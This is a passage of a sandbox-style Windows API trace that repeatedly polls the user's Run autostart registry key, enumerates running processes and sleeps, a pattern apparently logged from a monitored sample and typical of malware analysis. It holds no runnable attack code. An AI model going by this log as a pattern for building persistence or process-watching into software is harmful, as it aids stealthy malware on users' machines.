KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.619] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.619] NtClose (Handle=0x154) returned 0x0 [0179.619] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.619] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.620] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.620] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.620] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.622] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.623] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.635] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.635] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.636] NtClose (Handle=0x154) returned 0x0 [0179.636] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.636] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.637] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.637] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.637] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.639] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.640] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.650] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.650] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.650] NtClose (Handle=0x154) returned 0x0 [0179.650] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.651] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.651] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.651] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.653] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.654] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.666] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.666] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.666] NtClose (Handle=0x154) returned 0x0 [0179.666] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.667] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.668] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.668] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.668] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.671] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.672] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.681] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.681] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.681] NtClose (Handle=0x154) returned 0x0 [0179.681] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.682] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.682] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.683] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.683] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.685] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.686] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.697] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.697] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.697] NtClose (Handle=0x154) returned 0x0 [0179.697] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.698] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.699] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.699] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.702] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.702] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.712] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.712] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.713] NtClose (Handle=0x154) returned 0x0 [0179.713] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.714] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.715] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.715] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.717] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.718] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.728] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.728] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.728] NtClose (Handle=0x154) returned 0x0 [0179.729] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.729] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.730] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.730] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.730] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.732] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.733] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.744] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.744] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.745] NtClose (Handle=0x154) returned 0x0 [0179.745] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.745] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.746] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.746] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.749] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.750] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.759] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.759] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.759] NtClose (Handle=0x154) returned 0x0 [0179.759] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.760] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.760] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.760] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.760] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.763] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.764] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.775] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.775] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.775] NtClose (Handle=0x154) returned 0x0 [0179.775] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.775] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.776] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.776] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.776] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.779] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.779] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.790] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.791] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.791] NtClose (Handle=0x154) returned 0x0 [0179.791] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.791] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.791] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.792] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.794] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.794] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.806] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.806] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.806] NtClose (Handle=0x154) returned 0x0 [0179.806] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0179.807] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0179.807] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0179.807] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0179.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0179.809] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0179.810] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0179.824] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0179.825] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0179.825] NtClose (Handle=0x154) returned 0x0 [0179.825] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, 